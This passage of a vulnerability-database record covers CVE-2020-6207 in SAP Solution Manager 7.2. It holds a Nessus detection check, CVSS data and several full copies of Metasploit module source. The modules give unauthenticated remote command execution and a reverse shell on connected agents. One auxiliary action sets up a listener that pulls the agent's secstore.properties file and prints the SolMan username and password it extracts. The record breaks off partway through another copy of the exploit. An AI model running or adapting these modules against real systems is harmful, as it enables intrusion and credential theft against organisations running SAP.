paranoid since we can't see the patch level\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nif (app_info['version'] =~ \"^7.2\") {\n sps = app_info['SPS'];\n sps_fix = '12';\n if(!empty_or_null(sps) && ver_compare(ver:sps, fix:sps_fix) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, app_name, app_info['version'] + ' SP' + sps);\n}\n\nconstraints = [{ 'min_version' : '7.2', 'fixed_version' : '7.3', 'fixed_display' : 'Refer to vendor advisory'}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-03-26T14:49:19", "description": "", "cvss3": {}, "published": "2021-03-26T00:00:00", "type": "packetstorm", "title": "SAP Solution Manager 7.2 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6207"], "modified": "2021-03-26T00:00:00", "id": "PACKETSTORM:161993", "href": "https://packetstormsecurity.com/files/161993/SAP-Solution-Manager-7.2-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SAP Solution Manager remote unauthorized OS commands execution', \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability \n'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability \n'Dmitry Chastuhin', # @chipik The researcher who made first PoC \n'Vladimir Ivanov' # @_generic_human_ This Metasploit module \n], \n'Description' => %q{ \nThis module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of \nSAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication \nchecks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, \nsend HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. \n \nSuccessful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan \nagent as the user under which it runs SMDAgent service, usually daaadm. \n}, \n'References' => \n[ \n['CVE', '2020-6207'], \n['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'], \n['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207'] \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Linux', \n{ \n'Arch' => [ARCH_X64, ARCH_X86], \n'Platform' => 'linux', \n'CmdStagerFlavor' => ['printf', 'echo', 'bourne'] \n} \n], \n[ \n'Windows', \n{ \n'Arch' => [ARCH_X64, ARCH_X86], \n'Platform' => 'win', \n'CmdStagerFlavor' => ['certutil', 'vbs', 'debug_write', 'debug_asm'] \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-10-03' \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(50000), \nOptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']), \nOptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']), \n] \n) \nend \n \ndef setup_variables \n@host = datastore['RHOSTS'] \n@port = datastore['RPORT'] \n@path = datastore['TARGETURI'] \n \n@agent_name = datastore['AGENT'] \n@script_name = Rex::Text.rand_text_alphanumeric(12) \n \nif datastore['SSL'] \n@schema = 'https://' \nelse \n@schema = 'http://' \nend \n \n@solman_uri = \"#{@schema}#{@host}:#{@port}#{@path}\" \nend \n \ndef execute_command(cmd, _opts = {}) \nsetup_variables \n \nvprint_status(\"Start script: #{@script_name} with RCE payload on agent: #{@agent_name}\") \nsend_soap_request(make_soap_body(@agent_name, @script_name, make_rce_payload(cmd))) \n \nvprint_status(\"Stop script: #{@script_name} on agent: #{@agent_name}\") \nstop_script_in_agent(@agent_name, @script_name) \n \nvprint_status(\"Delete script: #{@script_name} on agent: #{@agent_name}\") \ndelete_script_in_agent(@agent_name, @script_name) \nend \n \n# Report Service and Vulnerability \ndef report_service_and_vuln \nreport_service( \nhost: @host, \nport: @port, \nname: 'soap', \nproto: 'tcp', \ninfo: 'SAP Solution Manager' \n) \nreport_vuln( \nhost: @host, \nport: @port, \nname: name, \nrefs: references \n) \nend \n \ndef check \nsetup_variables \nbegin \nagents = make_agents_array \nrescue RuntimeError \nreturn Exploit::CheckCode::Safe \nend \nif agents.empty? \nprint_status(\"Solution Manager server: #{@host}:#{@port} is vulnerable but no agents are connected!\") \nelse \nprint_good(\"Successfully retrieved agent list:\\n#{pretty_agents_table(agents)}\") \nend \nreport_service_and_vuln \nExploit::CheckCode::Vulnerable \nend \n \ndef exploit \nsetup_variables \ncheck_agent(@agent_name) \n \nprint_status(\"Enable EEM on agent: #{@agent_name}\") \nenable_eem(@agent_name) \n \nreport_service_and_vuln \nexecute_cmdstager \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161993/cve_2020_6207_solman_rs.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-02T03:06:02", "description": "This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan agent as the user under which it runs SMDAgent service, usually daaadm.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T13:51:21", "type": "metasploit", "title": "SAP Solution Manager remote unauthorized OS commands execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-SAP-CVE_2020_6207_SOLMAN_RS-", "href": "https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability\n 'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability\n 'Dmitry Chastuhin', # @chipik The researcher who made first PoC\n 'Vladimir Ivanov' # @_generic_human_ This Metasploit module\n ],\n 'Description' => %q{\n This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\n checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\n send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.\n\n Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan\n agent as the user under which it runs SMDAgent service, usually daaadm.\n },\n 'References' => [\n ['CVE', '2020-6207'],\n ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],\n ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Platform' => 'linux',\n 'CmdStagerFlavor' => ['printf', 'echo', 'bourne']\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Platform' => 'win',\n 'CmdStagerFlavor' => ['certutil', 'vbs', 'debug_write', 'debug_asm']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-10-03'\n )\n )\n\n register_options(\n [\n Opt::RPORT(50000),\n OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),\n OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),\n ]\n )\n end\n\n def setup_variables\n @host = datastore['RHOSTS']\n @port = datastore['RPORT']\n @path = datastore['TARGETURI']\n\n @agent_name = datastore['AGENT']\n @script_name = Rex::Text.rand_text_alphanumeric(12)\n\n if datastore['SSL']\n @schema = 'https://'\n else\n @schema = 'http://'\n end\n\n @solman_uri = \"#{@schema}#{@host}:#{@port}#{@path}\"\n end\n\n def execute_command(cmd, _opts = {})\n setup_variables\n\n vprint_status(\"Start script: #{@script_name} with RCE payload on agent: #{@agent_name}\")\n send_soap_request(make_soap_body(@agent_name, @script_name, make_rce_payload(cmd)))\n\n vprint_status(\"Stop script: #{@script_name} on agent: #{@agent_name}\")\n stop_script_in_agent(@agent_name, @script_name)\n\n vprint_status(\"Delete script: #{@script_name} on agent: #{@agent_name}\")\n delete_script_in_agent(@agent_name, @script_name)\n end\n\n # Report Service and Vulnerability\n def report_service_and_vuln\n report_service(\n host: @host,\n port: @port,\n name: 'soap',\n proto: 'tcp',\n info: 'SAP Solution Manager'\n )\n report_vuln(\n host: @host,\n port: @port,\n name: name,\n refs: references\n )\n end\n\n def check\n setup_variables\n begin\n agents = make_agents_array\n rescue RuntimeError\n return Exploit::CheckCode::Safe\n end\n if agents.empty?\n print_status(\"Solution Manager server: #{@host}:#{@port} is vulnerable but no agents are connected!\")\n else\n print_good(\"Successfully retrieved agent list:\\n#{pretty_agents_table(agents)}\")\n end\n report_service_and_vuln\n Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n setup_variables\n check_agent(@agent_name)\n\n print_status(\"Enable EEM on agent: #{@agent_name}\")\n enable_eem(@agent_name)\n\n report_service_and_vuln\n execute_cmdstager\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-03T19:06:24", "description": "This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T13:51:21", "type": "metasploit", "title": "SAP Solution Manager remote unauthorized OS commands execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2021-08-27T16:19:43", "id": "MSF:AUXILIARY-ADMIN-SAP-CVE_2020_6207_SOLMAN_RCE-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth\n include Msf::Exploit::Local::SapSmdAgentUnencryptedProperty\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability\n 'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability\n 'Dmitry Chastuhin', # @chipik The researcher who made first PoC\n 'Vladimir Ivanov' # @_generic_human_ This Metasploit module\n ],\n 'Description' => %q{\n This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\n checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\n send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.\n\n Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected\n to SolMan as a user from which the SMDAgent service starts, usually the daaadm.\n },\n 'References' => [\n ['CVE', '2020-6207'],\n ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],\n ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']\n ],\n 'Actions' => [\n ['LIST', { 'Description' => 'List connected agents' }],\n ['SSRF', { 'Description' => 'Send SSRF from connected agent' }],\n ['EXEC', { 'Description' => 'Exec OS command on connected agent' }],\n ['SECSTORE', { 'Description' => 'Get file with SolMan credentials from connected agent' }]\n ],\n 'DefaultAction' => 'LIST',\n 'DisclosureDate' => '2020-10-03'\n )\n )\n register_options(\n [\n Opt::RPORT(50000),\n OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),\n OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),\n OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),\n OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),\n OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),\n OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),\n OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),\n ]\n )\n end\n\n def setup_xml_and_variables\n @host = datastore['RHOSTS']\n @port = datastore['RPORT']\n @srv_host = datastore['SRVHOST']\n @srv_port = datastore['SRVPORT']\n @path = datastore['TARGETURI']\n\n @agent_name = datastore['AGENT']\n @script_name = Rex::Text.rand_text_alphanumeric(12)\n\n if datastore['SSL']\n @schema = 'https://'\n else\n @schema = 'http://'\n end\n\n @solman_uri = \"#{@schema}#{@host}:#{@port}#{@path}\"\n\n @ssrf_method = datastore['SSRF_METHOD']\n @ssrf_uri = datastore['SSRF_URI']\n @ssrf_payload = make_ssrf_payload(@ssrf_method, @ssrf_uri)\n @rce_command = datastore['COMMAND']\n\n @username = nil\n @password = nil\n end\n\n # Report Service and Vulnerability\n def report_service_and_vuln\n report_service(\n host: @host,\n port: @port,\n name: 'soap',\n proto: 'tcp',\n info: 'SAP Solution Manager'\n )\n report_vuln(\n host: @host,\n port: @port,\n name: name,\n refs: references\n )\n end\n\n # Handle incoming HTTP requests from connected agents\n def on_request_uri(cli, request)\n response = create_response(200, 'OK')\n response.body = 'Received'\n cli.send_response(response)\n\n agent_host = cli.peerhost\n request_uri = request.raw_uri\n secstore_content = request.body\n secstore_filename = request.headers['X-File-Name']\n\n if secstore_content.nil? || secstore_filename.nil? || agent_host.nil? || request_uri.nil? || request_uri != \"/#{@script_name}\"\n fail_with(Failure::PayloadFailed, \"Failed to retrieve secstore.properties file from agent #{@agent_name}.\")\n end\n print_status(\"Received HTTP request from agent #{@agent_name} - #{agent_host}\")\n\n # Loot secstore.properties file\n loot = store_loot('smdagent.secstore.properties', 'text/plain', agent_host, secstore_content, secstore_filename, 'SMD Agent secstore.properties file')\n print_good(\"Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} saved in: #{loot}\")\n vprint_good(\"File content:\\n#{secstore_content}\")\n\n # Analyze secstore.properties file\n properties = parse_properties(secstore_content)\n properties.each do |property|\n case property[:name]\n when 'smd/agent/User'\n @username = property[:value]\n when 'smd/agent/Password'\n @password = property[:value]\n end\n end\n\n # Store decoded credentials and report vulnerability\n if @username.nil? || @password.nil?\n fail_with(Failure::NotVulnerable, \"The agent: #{@agent_name} sent a secstore.properties file, but this file is likely encrypted or does not contain credentials. The agent: #{@agent_name} is likely patched.\")\n else\n # Store decoded credentials\n print_good(\"Successfully encoded credentials for SolMan server: #{@host}:#{@port} from agent: #{@agent_name} - #{agent_host}\")\n print_good(\"SMD username: #{@username}\")\n print_good(\"SMD password: #{@password}\")\n store_valid_credential(\n user: @username,\n private: @password,\n private_type: :password,\n service_data: {\n origin_type: :service,\n address: @host,\n port: @port,\n service_name: 'http',\n protocol: 'tcp'\n }\n )\n # Report vulnerability\n new_references_array = [\n %w[CVE 2019-0307],\n %w[URL https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf]\n ]\n new_references = Rex::Transformer.transform(new_references_array, Array, [SiteReference, Reference], 'Ref')\n report_vuln(\n host: agent_host,\n name: 'Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server',\n refs: new_references\n )\n end\n end\n\n def run\n setup_xml_and_variables\n case action.name\n when 'LIST'\n action_list\n when 'SSRF'\n action_ssrf\n when 'EXEC'\n action_exec\n when 'SECSTORE'\n action_secstore\n else\n print_error(\"The action #{action.name} is not a supported action.\")\n end\n end\n\n def action_list\n print_status(\"Getting a list of agents connected to the Solution Manager: #{@host}\")\n agents = make_agents_array\n\n report_service_and_vuln\n if agents.empty?\n print_good(\"Solution Manager server: #{@host}:#{@port} is vulnerable but no agents are connected!\")\n else\n print_good(\"Successfully retrieved agent list:\\n#{pretty_agents_table(agents)}\")\n end\n end\n\n def action_ssrf\n check_agent(@agent_name)\n\n print_status(\"Enable EEM on agent: #{@agent_name}\")\n enable_eem(@agent_name)\n\n print_status(\"Start script: #{@script_name} with SSRF payload on agent: #{@agent_name}\")\n send_soap_request(make_soap_body(@agent_name, @script_name, @ssrf_payload))\n\n print_status(\"Stop script: #{@script_name} on agent: #{@agent_name}\")\n stop_script_in_agent(@agent_name, @script_name)\n\n print_status(\"Delete script: #{@script_name} on agent: #{@agent_name}\")\n delete_script_in_agent(@agent_name, @script_name)\n\n report_service_and_vuln\n print_good(\"Send SSRF: '#{@ssrf_method} #{@ssrf_uri} HTTP/1.1' from agent: #{@agent_name}\")\n end\n\n def action_exec\n check_agent(@agent_name)\n\n print_status(\"Enable EEM on agent: #{@agent_name}\")\n enable_eem(@agent_name)\n\n print_status(\"Start script: #{@script_name} with RCE payload on agent: #{@agent_name}\")\n send_soap_request(make_soap_body(@agent_name, @script_name, make_rce_payload(@rce_command)))\n\n print_status(\"Stop script: #{@script_name} on agent: #{@agent_name}\")\n stop_script_in_agent(@agent_name, @script_name)\n\n print_status(\"Delete script: #{@script_name} on agent: #{@agent_name}\")\n delete_script_in_agent(@agent_name, @script_name)\n\n report_service_and_vuln\n print_good(\"Execution command: '#{@rce_command}' on agent: #{@agent_name}\")\n end\n\n def action_secstore\n agent = check_agent(@agent_name)\n\n print_status(\"Enable EEM on agent: #{@agent_name}\")\n enable_eem(@agent_name)\n\n start_service(\n {\n 'Uri' => {\n 'Proc' => proc { |cli, req| on_request_uri(cli, req) },\n 'Path' => \"/#{@script_name}\"\n }\n }\n )\n @creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, \"/#{@script_name}\")\n print_status(\"Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}\")\n send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))\n\n sleep(5)\n print_status(\"Stop script: #{@script_name} on agent: #{@agent_name}\")\n stop_script_in_agent(@agent_name, @script_name)\n\n print_status(\"Delete script: #{@script_name} on agent: #{@agent_name}\")\n delete_script_in_agent(@agent_name, @script_name)\n\n report_service_and_vuln\n if @username.nil? && @password.nil?\n print_error(\"Failed to retrieve or decode SolMan credentials file from agent: #{@agent_name}\")\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-20T22:48:32", "description": "PoC for **CVE-2020-6207** (Missing Authentication Check in SAP ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-14T10:49:40", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Sap Solution Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2022-07-20T21:30:47", "id": "B603AF38-7E85-5B62-8806-5E004DA884C8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-11-20T15:02:44", "description": "SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-6207", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2020-07-24T00:00:00", "id": "AKB:56C88ED5-2508-415E-962F-DE1CDBF69D5B", "href": "https://attackerkb.com/topics/CjM1DUFUOx/cve-2020-6207", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-10-06T00:55:43", "description": "This Metasploit module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents allowing an attacker to send HTTP requests (SSRF) and execute OS commands on the connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation will allow unauthenticated remote attackers to get a reverse shell from connected to the SolMan agent as the user under which it runs SMDAgent service, which is usually daaadm.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "zdt", "title": "SAP Solution Manager 7.2 Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2021-03-26T00:00:00", "id": "1337DAY-ID-36039", "href": "https://0day.today/exploit/description/36039", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability\r\n 'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability\r\n 'Dmitry Chastuhin', # @chipik The researcher who made first PoC\r\n 'Vladimir Ivanov' # @_generic_human_ This Metasploit module\r\n ],\r\n 'Description' => %q{\r\n This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\r\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\r\n checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\r\n send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.\r\n\r\n Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan\r\n agent as the user under which it runs SMDAgent service, usually daaadm.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2020-6207'],\r\n ['URL', 